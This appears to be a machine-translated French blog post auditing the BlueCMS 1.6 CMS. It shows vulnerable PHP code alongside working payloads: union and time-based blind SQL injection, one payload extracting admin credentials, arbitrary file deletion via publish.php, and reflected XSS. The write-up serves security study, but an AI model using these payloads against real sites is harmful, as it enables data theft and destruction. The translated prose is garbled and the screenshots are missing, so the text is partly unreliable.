vérification de code Bluecms1.6

l'injection d'ad_js

injection numérique
Insérer ici l'image Description

1%20union%20select%201,2,3,4,5,6,(select%20user())

Insérer ici l'image Description

l'injection d'common.inc.php

Dans le présent document comprennent, devrait être la base d'une fonction ou la configuration, de sorte que tout document qui contient ce qui peut être injecté emmm
trouver publish.php, juste contient le fichier
Insérer ici l'image Description
point d'injection de common.inc.php:

if(!$_SESSION['user_id'])
{
    if($_COOKIE['BLUE']['user_id'] && $_COOKIE['BLUE']['user_name'] && $_COOKIE['BLUE']['user_pwd'])
    {
        if(check_cookie($_COOKIE['BLUE']['user_name'], $_COOKIE['BLUE']['user_pwd']))
        {
            update_user_info($_COOKIE['BLUE']['user_name']);
        }
    }
    else if($_COOKIE['BLUE']['user_name'])
    {

        $user_name = $_COOKIE['BLUE']['user_name'];
        $user = $db->query("SELECT COUNT(*) AS num FROM ".table('user')." WHERE user_name='$user_name'");

Si vous ne pouvez pas voir l'atterrissage, et seulement $ _COOKIE [ « blue »] [ « user_name »] a une valeur, il sera question sql, mais semble qu'il y ait des stores ne peut
Insérer ici l'image Description
sauter automatiquement à la page d'atterrissage après un délai, afin de voir la J'ai d' abord clairement annotés Jump:
Insérer ici l'image Description
filtrage rien, le succès retard
Insérer ici l'image Description
poc:

BLUE[user_name]:w4'and if(((ascii(mid((select database()),1,1)))=98),sleep(3),0)#

publish.php supprimer tout fichier

Dans la ligne 316:
Insérer ici l'image Description
paramètres contrôlables $ act:
Insérer ici l'image Description
l'identifiant indiqué ci - dessus également contrôlable, créez une page de test:
Insérer ici l'image Description
Insérer ici l'image Description

publish.php?act=del_pic&id=test.php

Visitez à nouveau:
Insérer ici l'image Description
où les fichiers supprimés ont beaucoup de colonnes sur celui - ci , il ~

user.php XSS

Il y a XSS-mail à
Insérer ici l'image Description
Insérer ici l'image Description

admin / card.php XSS (type à réflexion)

Aucun nom de filtre à la sortie directe, vous pouvez donc que la bombe
Insérer ici l'image Description

name=<script>alert(1)</script>&value=1&price=1&act=do_edit&id=1

Insérer ici l'image Description

fichier contient user.php

Insérer ici l'image Description
Celui-ci contient un point contrôlable, mais la plupart du temps derrière le index.php, 00% troncature ne réussit pas, je fait référence à l'article en ligne, avec

La longueur maximale est de 256 octets répertoire sous Windows, la longueur maximale du répertoire Linux de 4096 octets

Des idées, la version 5.2, mais pas comment sont inclus, ce qui représente pour la fosse

l'injection d'comment.php

charge utile;

1','1'),('','1','2','1','6',(select concat(admin_name,':',pwd) from blue_admin),'1','1

Insérer ici l'image Description

tpl_manage.php modifier un fichier

Insérer ici l'image Description
Insérer ici l'image Description
Insérer ici l'image Description
Insérer ici l'image Description

User.php tout saut

Insérer ici l'image Description
Peut-être qui peut être utilisé SSRF ce qui est nécessaire base64
Insérer ici l'image Description

résumé

Les premiers cm look, ne savent pas où commencer, une petite faiblesse, quelques trous évidents ou parfois n'a pas remarqué, cependant, que le code de petites cms est pas si compliqué, la vulnérabilité est relativement simple et facile à utiliser, soyez le premier à démarrer, assez petite récolte, après le cms d'essai plus important est d'obtenir les commentaires de l'utilisateur commence à voir Ceci est juste une petite source d'instabilité? (NaH)

Je suppose que tu aimes

Origine www.cnblogs.com/W4nder/p/12528857.html
conseillé
Classement